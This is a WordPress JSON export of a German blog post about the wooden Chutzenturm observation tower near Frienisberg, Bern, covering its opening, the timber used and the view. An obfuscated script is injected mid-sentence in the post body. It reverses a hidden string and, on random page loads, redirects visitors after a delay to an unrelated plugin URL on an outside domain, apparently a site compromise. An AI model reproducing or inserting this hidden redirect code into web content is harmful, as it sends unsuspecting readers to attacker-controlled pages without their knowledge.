{"id":861,"date":"2010-08-21T09:27:32","date_gmt":"2010-08-21T08:27:32","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?p=861"},"modified":"2013-02-13T11:24:03","modified_gmt":"2013-02-13T10:24:03","slug":"chutzenturm-frienisberg-bern","status":"publish","type":"post","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/archives\/861","title":{"rendered":"Chutzenturm Frienisberg, Bern"},"content":{"rendered":"<p>In der wundersch\u00f6nen Umgebung vom Frienisberg bei Bern wurde am 26. Juni 2010 der Chutzenturm er\u00f6ffnet. Mit diesem wurde ein Projekt wurde die Idee &#8222;einer breiten \u00d6ffentlichkeit durch diesen Turm den Wald und das Holz n\u00e4her zubringen&#8220;\u00a0 umgesetzt. Der Turm wurde mit dem Holz aus dem Raume Frieniesberg erstellt. Ben\u00f6titig wurden 460 m3 Douglasien und Eichenholz um den sch\u00f6nen Turm mit einer H\u00f6he von 45 Metern zu erschaffen. Mehr Infos findet Ihr unter <a title=\"Chutzenturm Frienisberg Bern\" href=\"http:\/\/www.chutzenturm.ch\/\" target=\"_blank\">http:\/\/www.chutzenturm.ch\/<\/a><\/p>\n<p>Die Aussicht ist grandios vom Jura bis in die Alpen bei klarer Sicht und \u00fcber das sch\u00f6ne Dreiseenland (Mittelland). Die Anreise einfach und der Spaziergang zum Turm <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>toll.<\/p>\n<p>Geniesst die Eindr\u00fccke vom Sonnenaufgang und dem Turm<\/p>\n<p>&nbsp;<\/p>\nngg_shortcode_0_placeholder\n","protected":false},"excerpt":{"rendered":"<p>In der wundersch\u00f6nen Umgebung vom Frienisberg bei Bern wurde am 26. Juni 2010 der Chutzenturm er\u00f6ffnet. Mit diesem wurde ein Projekt wurde die Idee &#8222;einer breiten \u00d6ffentlichkeit durch diesen Turm den Wald und das Holz n\u00e4her zubringen&#8220;\u00a0 umgesetzt. Der Turm wurde mit dem Holz aus dem Raume Frieniesberg erstellt. Ben\u00f6titig wurden 460 m3 Douglasien und&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[1629,1651,1652],"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/861"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=861"}],"version-history":[{"count":2,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions"}],"predecessor-version":[{"id":862,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions\/862"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/categories?post=861"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/tags?post=861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}